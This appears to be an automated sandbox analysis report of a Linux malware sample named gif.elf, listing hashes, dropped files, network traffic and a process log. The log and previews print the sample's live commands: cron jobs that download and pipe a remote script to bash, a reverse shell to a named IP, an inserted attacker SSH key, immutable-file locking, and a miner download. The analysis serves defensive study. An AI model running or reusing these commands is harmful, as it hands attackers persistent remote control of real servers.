FEDERAL-ONLINE-GROUP-LLCUS | zE1VxVoZ3W.exe | malicious | FormBook | 192.186.57.30
FEDERAL-ONLINE-GROUP-LLCUS | armv7l.elf | malicious | Mirai | 192.186.10.228
FEDERAL-ONLINE-GROUP-LLCUS | print preview.js | malicious | FormBook | 192.186.57.30
FEDERAL-ONLINE-GROUP-LLCUS | 1013911.js | malicious | FormBook | 192.186.57.30
FEDERAL-ONLINE-GROUP-LLCUS | la.bot.arm.elf | malicious | Unknown | 192.186.10.220
FEDERAL-ONLINE-GROUP-LLCUS | vJSyCK4is2.elf | malicious | Mirai | 192.186.57.229
FEDERAL-ONLINE-GROUP-LLCUS | 12029.exe | malicious | GuLoader | 192.186.7.211
FEDERAL-ONLINE-GROUP-LLCUS | qmF3fz3Zn4.exe | malicious | GuLoader | 192.186.7.211
      No context
      No context
      Process:/bin/sh
      File Type:ASCII text
      Category:dropped
      Size (bytes):57
      Entropy (8bit):4.384064175252616
      Encrypted:false
      SSDEEP:3:9991KexA/FN3HLWUPGHFppkev:6exA/33HLDGnpkev
      MD5:6A0F0DC196D42B180C24DA7A372FCF05
      SHA1:3189560C64D1CE9030647A477C2B2C8CA180B937
      SHA-256:AA6124CA198DA79C50B97D98868F6769126DBB2F0CCAD0B0F85B6E1F2E903D95
      SHA-512:AF352C95566447CD1798A1C697AAE73920AA95F1E8AC6A48D61603EA2C2588E7440B111908A6D72C89744425C45066541871483D21A0D11434500EBB6A60560B
      Malicious:true
      Reputation:low
      Preview:0 2 * * * root wget -c http://z.shavsl.com/b -qO -|bash .
      Process:/bin/sh
      File Type:ASCII text
      Category:dropped
      Size (bytes):43
      Entropy (8bit):4.489877254551158
      Encrypted:false
      SSDEEP:3:lyMva6VK1XefLWUKT1:lfva6VK1Xee1
      MD5:F77E954ADACCF91A9A0CADE858336A4D
      SHA1:76073B74710DC6291EC882FBE771F1B38803E524
      SHA-256:D9D607BE4896C4EFD967BC034666A3907F3EF12DE9BECF91733DCF0EBE417CA2
      SHA-512:58D2B48D9EB8AFE9D50EC08B73DE4AEA57288194675739B5EDF6961EE5B999876B5938E11CCE9747E3689CF3E559AD9A62A7642E6EC24514145FEA953AD68E98
      Malicious:true
      Reputation:low
      Preview:bash -i >& /dev/tcp/45.125.66.31/8443 0>&1.
      Process:/tmp/gif.elf
      File Type:OpenSSH RSA public key
      Category:dropped
      Size (bytes):391
      Entropy (8bit):5.890545217406209
      Encrypted:false
      SSDEEP:6:2k0cAvgmfpQ5T26U5n4gQLgZ3AxgyxOYwFQhymEpgXkB/js0X+wJmMnYYj:4cWnpiH0VQLYAxhwY5hPQw2bsQdnYYj
      MD5:4968B16E23E6854F827539320EFDC6B3
      SHA1:BC6C9965E7D3651DD2E2E7798A74907D9CAD59FA
      SHA-256:E9E25CC3FD9285DA9E195BA601D76BA65DE6209487F0DA3B45F76FD31EFC44E1
      SHA-512:1CAF31C290C4F0EED7BCA6AD264F0C7D870104B75921410213F26348B0AFB22E9460045419FBD4613A32BBDD503E2608BB063B02F2117A454DCB3500355F09B7
      Malicious:true
      Reputation:low
      Preview:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtNw4sDrVPO1dELkT5ag+Wa5ewywgEGC6oQJ7ugP01cUJR+6UVnx6DipvZuqWFAkA9Zm7sJUrY6K430wFv82ZNWkbJOjcf1lhl4++njRt1vxwmTheSecwlDvk5fRf6086rm2HmmdvvsUsvSaowbDD23WNXfI3rAibluVhjNmqcFfLvB5DWO8E42zkq8jk1CWdM95D/mtDzCIrxbg/azBdfsXCU1hP8JvjAgDCkelc7NIesmT6ibG4uqeNg2IWiX/M0YG8T9hWoOHJasTl+Ub+gU34Imz21l9JJ66yQtD0GtgszFJBS4AelNSrVOjHEouR9Bx6AToB515nKJ7NEvGSz root@vps1.
      Process:/tmp/gif.elf
      File Type:OpenSSH RSA public key
      Category:dropped
      Size (bytes):782
      Entropy (8bit):5.890545217406209
      Encrypted:false
      SSDEEP:12:4cWnpiH0VQLYAxhwY5hPQw2bsQdnYYAFcWnpiH0VQLYAxhwY5hPQw2bsQdnYYj:R5pb/gNdSm5pb/gNdt
      MD5:9FA4780AFF535CC3ABFC28270A3DBAF5
      SHA1:202CB6C134B01506FA8B2E590A1700A8D3400A4F
      SHA-256:F4DD2F81E119FFC0C202DECFB28810154C607B6F1FBCA2021D4A9CB399CBA4BB
      SHA-512:1C6B6931589906DABC0CBE27B790CA23BAEADCA0BAA2D22B1D4CE8B4D98F5D01806A5A9B620908012B2057199B5C5C8B96C7B95A4E2EC0F0E963E4F7A43FA23B
      Malicious:true
      Reputation:low
      Preview:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtNw4sDrVPO1dELkT5ag+Wa5ewywgEGC6oQJ7ugP01cUJR+6UVnx6DipvZuqWFAkA9Zm7sJUrY6K430wFv82ZNWkbJOjcf1lhl4++njRt1vxwmTheSecwlDvk5fRf6086rm2HmmdvvsUsvSaowbDD23WNXfI3rAibluVhjNmqcFfLvB5DWO8E42zkq8jk1CWdM95D/mtDzCIrxbg/azBdfsXCU1hP8JvjAgDCkelc7NIesmT6ibG4uqeNg2IWiX/M0YG8T9hWoOHJasTl+Ub+gU34Imz21l9JJ66yQtD0GtgszFJBS4AelNSrVOjHEouR9Bx6AToB515nKJ7NEvGSz root@vps1.ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtNw4sDrVPO1dELkT5ag+Wa5ewywgEGC6oQJ7ugP01cUJR+6UVnx6DipvZuqWFAkA9Zm7sJUrY6K430wFv82ZNWkbJOjcf1lhl4++njRt1vxwmTheSecwlDvk5fRf6086rm2HmmdvvsUsvSaowbDD23WNXfI3rAibluVhjNmqcFfLvB5DWO8E42zkq8jk1CWdM95D/mtDzCIrxbg/azBdfsXCU1hP8JvjAgDCkelc7NIesmT6ibG4uqeNg2IWiX/M0YG8T9hWoOHJasTl+Ub+gU34Imz21l9JJ66yQtD0GtgszFJBS4AelNSrVOjHEouR9Bx6AToB515nKJ7NEvGSz root@vps1.
      Process:/usr/bin/curl
      File Type:ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, no section header
      Category:dropped
      Size (bytes):129687
      Entropy (8bit):7.998259484612439
      Encrypted:true
      SSDEEP:3072:ZhGZuPvqjVxcMQ1T+7dioPaxMCxfaCkOPdf3q4DK2sgWaUkWj:PQeswmwxMCxiCkOQ4DF1O/j
      MD5:8762E4ECB53B774CBBED8FDBE365D2F9
      SHA1:75BA7202050AF82DE5D53347D6E153C4F70F3CC5
      SHA-256:CA5FB6191109FCFF0C72C33D7BA9F306E9985532BDDCB93207184A6C83132A2A
      SHA-512:B1519A946544949ACAC8D392E1273D2AF58AD301E92B915FE9034ED8FD1615FE6B30BB42ADFD95B6D8D0FE5C1DEDEEA3CF0FF531E028F2F3383277061DBDF1DA
      Malicious:true
      Reputation:low
      Preview:.ELF..............>.......[.....@...................@.8...@.......................@.......@....................... .............`.......`.......`......................... .....)]..UPX!L.........K...K.X...k..........?.E.h=.....N.....e..U.....bo.G...y..$...pL.:rz3......{w.......`....A..h...T.NF%..FM.%j...k.>h#r.OH..R.........(:.M.1@.......7.NJ..........m..'..>.......J.T[...[.f=.....N..O(..)v...S._....#.;dq.2.7...}.p.D..o.B."...N.Z.~}l....:..O.&..HJ........5N.QQ...>...J....t^p........etq....d......}.,...7.E..T.lm.Q"2.x.}......Xv....E......R(N...t..9D*.u"..T.1..3.=.7.F...W....fB..a.jF.y.'..R..X,.X.....r,...%.F.u.....:.5!.kPd.qQ&../.V......G.....k.b..>lq...4..l..~Jp[..{q;4.....0i..!$.jDb...&...<...a......K...S. .......*3j6Z,..Zr^qH....i..FD./.0..Ho......L..]....:V...+K........]X.../.?...0..7...[....X1.m....<$.....I..O.Fo..I..^..se..t........l.............#cL...}v...?N.gT.I..kU..g...],..O....).?2.K^I3-)\.y...a..R.]...4.\>.w..E.xb...z[.'4..1..q.E.$...g.
      File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), too many section (64254)
      Entropy (8bit):4.084486346191242
      TrID:
      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
      File name:gif.elf
      File size:115'848 bytes
      MD5:4711254a232e4cbd4d98deb46e757f1d
      SHA1:93664323281e82fe36a847f785d6805891d20e42
      SHA256:1ce1b7de294df5c603d080376caf27f5f09ac16ba1ace7356e23e43db75ed60c
      SHA512:2bdfeec4aa204a6a6270db8334fbc5bf9fa8bb7e622fafb6348a4464a5772d89634187962abfb1ed1bca2fad6cb1046002a2d47f19a88a128ad5e8d9f0fc1c64
      SSDEEP:768:Xe4Cljck6kkQk7mkRBcmuhwhmRCh+oKhAg0gNuUfQHsC/0e3SYal23ErC1:XiRioCQCh+pAgwUfGsCsmil2Ur
      TLSH:54B34B43F0504CFAE899C9B8079B8525F6E3B0E51218376A33CCFA70671BF957619BA1
      File Content Preview:.ELF..............>.......@.....@...................@.8...@.......................@.......@.....$.......$......... .......................a.......a.....(.......P......... .....Q.td....................................................R.td..............a....


      TimestampSource PortDest PortSource IPDest IP
      Mar 9, 2025 17:29:50.374367952 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:50.374367952 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:50.374382973 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:51.572988987 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:51.573060989 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:51.573092937 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:51.573174000 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:51.573174000 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:51.573194981 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:52.188642979 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:52.188688993 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:52.188829899 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:52.188849926 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:52.379038095 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:52.379074097 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:52.379129887 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:52.379158020 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:52.379179001 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:52.379179001 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:52.379201889 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:52.379246950 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:52.379348040 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:52.379383087 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:52.379410028 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:52.379417896 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:52.379437923 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:52.379478931 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:52.379736900 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:52.382846117 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:52.387931108 CET8055378192.186.12.50192.168.2.13
      Timestamp | Source Port | Dest Port | Source IP | Dest IP
      Mar 9, 2025 17:28:10.368211031 CET | 36051 | 53 | 192.168.2.13 | 8.8.8.8
      Mar 9, 2025 17:28:10.368339062 CET | 36726 | 53 | 192.168.2.13 | 8.8.8.8
      Mar 9, 2025 17:28:10.381171942 CET | 53 | 36051 | 8.8.8.8 | 192.168.2.13
      Mar 9, 2025 17:28:10.382752895 CET | 53 | 36726 | 8.8.8.8 | 192.168.2.13
      Mar 9, 2025 17:30:53.678282976 CET | 55638 | 53 | 192.168.2.13 | 8.8.8.8
      Mar 9, 2025 17:30:53.678419113 CET | 55328 | 53 | 192.168.2.13 | 8.8.8.8
      Mar 9, 2025 17:30:53.684900999 CET | 53 | 55638 | 8.8.8.8 | 192.168.2.13
      Mar 9, 2025 17:30:53.685023069 CET | 53 | 55328 | 8.8.8.8 | 192.168.2.13
      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
      Mar 9, 2025 17:28:10.368211031 CET | 192.168.2.13 | 8.8.8.8 | 0x9bb0 | Standard query (0) | w.softprojectcode.com | A (IP address) | IN (0x0001) | false
      Mar 9, 2025 17:28:10.368339062 CET | 192.168.2.13 | 8.8.8.8 | 0x84fa | Standard query (0) | w.softprojectcode.com | 28 | IN (0x0001) | false
      Mar 9, 2025 17:30:53.678282976 CET | 192.168.2.13 | 8.8.8.8 | 0x2048 | Standard query (0) | daisy.ubuntu.com | A (IP address) | IN (0x0001) | false
      Mar 9, 2025 17:30:53.678419113 CET | 192.168.2.13 | 8.8.8.8 | 0x6578 | Standard query (0) | daisy.ubuntu.com | 28 | IN (0x0001) | false
      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
      Mar 9, 2025 17:28:10.381171942 CET | 8.8.8.8 | 192.168.2.13 | 0x9bb0 | No error (0) | w.softprojectcode.com | | 192.186.12.50 | A (IP address) | IN (0x0001) | false
      Mar 9, 2025 17:28:10.381171942 CET | 8.8.8.8 | 192.168.2.13 | 0x9bb0 | No error (0) | w.softprojectcode.com | | 107.167.42.211 | A (IP address) | IN (0x0001) | false
      Mar 9, 2025 17:28:10.381171942 CET | 8.8.8.8 | 192.168.2.13 | 0x9bb0 | No error (0) | w.softprojectcode.com | | 107.167.42.210 | A (IP address) | IN (0x0001) | false
      Mar 9, 2025 17:28:10.381171942 CET | 8.8.8.8 | 192.168.2.13 | 0x9bb0 | No error (0) | w.softprojectcode.com | | 107.167.34.74 | A (IP address) | IN (0x0001) | false
      Mar 9, 2025 17:28:10.381171942 CET | 8.8.8.8 | 192.168.2.13 | 0x9bb0 | No error (0) | w.softprojectcode.com | | 107.167.34.78 | A (IP address) | IN (0x0001) | false
      Mar 9, 2025 17:28:10.381171942 CET | 8.8.8.8 | 192.168.2.13 | 0x9bb0 | No error (0) | w.softprojectcode.com | | 192.186.12.54 | A (IP address) | IN (0x0001) | false
      Mar 9, 2025 17:30:53.684900999 CET | 8.8.8.8 | 192.168.2.13 | 0x2048 | No error (0) | daisy.ubuntu.com | | 162.213.35.25 | A (IP address) | IN (0x0001) | false
      Mar 9, 2025 17:30:53.684900999 CET | 8.8.8.8 | 192.168.2.13 | 0x2048 | No error (0) | daisy.ubuntu.com | | 162.213.35.24 | A (IP address) | IN (0x0001) | false
      • w.softprojectcode.com

      Session ID | Source IP | Source Port | Destination IP | Destination Port
      0 | 192.168.2.13 | 55378 | 192.186.12.50 | 80

      Timestamp: Mar 9, 2025 17:28:10.400379896 CET
      Bytes transferred: 102
      Direction: OUT
      Data:
      GET /miner HTTP/1.1
      Host: w.softprojectcode.com
      User-Agent: curl/7.68.0
      Accept: */*

      Timestamp: Mar 9, 2025 17:28:34.594938993 CET
      Bytes transferred: 1236
      Direction: IN
      Data:
      HTTP/1.1 200 OK
      Server: nginx
      Date: Sun, 09 Mar 2025 16:28:13 GMT
      Content-Type: application/octet-stream
      Content-Length: 1827416
      Last-Modified: Thu, 06 Mar 2025 14:57:05 GMT
      Connection: keep-alive
      ETag: "67c9b7c1-1be258"
      Accept-Ranges: bytes


      System Behavior

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:/tmp/gif.elf
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia -R /root/.ssh"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia -R /root/.ssh
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "rm -rf /root/.ssh/authorized_keys2"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/usr/bin/rm
      Arguments:rm -rf /root/.ssh/authorized_keys2
      File size:72056 bytes
      MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr +i /root/.ssh/authorized_keys2"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr +i /root/.ssh/authorized_keys2
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia -R /etc/cron.d > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:08
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia -R /etc/cron.d
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia /etc/crontab > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia /etc/crontab
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia -R /var/spool/cron > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia -R /var/spool/cron
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia -R /var/spool/cron/crontabs > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia -R /var/spool/cron/crontabs
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia -R /etc/cron.hourly > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia -R /etc/cron.hourly
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "echo '0 1 * * * root curl -fs http://z.shavsl.com/b|bash ' > /etc/cron.d/watch"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "echo '0 2 * * * root wget -c http://z.shavsl.com/b -qO -|bash ' >> /etc/cron.d/watch"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr +i /etc/cron.d/watch > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr +i /etc/cron.d/watch
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "echo '#!/bin/bash' > /etc/cron.hourly/prelink"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "echo 'bash -i >& /dev/tcp/45.125.66.31/8443 0>&1' >> /etc/cron.hourly/prelink"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chmod 755 /etc/cron.hourly/prelink"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/chmod
      Arguments:chmod 755 /etc/cron.hourly/prelink
      File size:63864 bytes
      MD5 hash:739483b900c045ae1374d6f53a86a279

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr +i /etc/cron.hourly/prelink > /dev/null 2>&1"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr +i /etc/cron.hourly/prelink
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr -ia -R /root/.ssh"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr -ia -R /root/.ssh
      File size:14656 bytes
      MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "rm -rf /root/.ssh/authorized_keys"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/rm
      Arguments:rm -rf /root/.ssh/authorized_keys
      File size:72056 bytes
      MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/tmp/gif.elf
      Arguments:-
      File size:115848 bytes
      MD5 hash:4711254a232e4cbd4d98deb46e757f1d

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:sh -c "chattr +i /root/.ssh/authorized_keys"
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/bin/sh
      Arguments:-
      File size:129816 bytes
      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

      Start time (UTC):16:28:09
      Start date (UTC):09/03/2025
      Path:/usr/bin/chattr
      Arguments:chattr +i /root/.ssh/authorized_keys
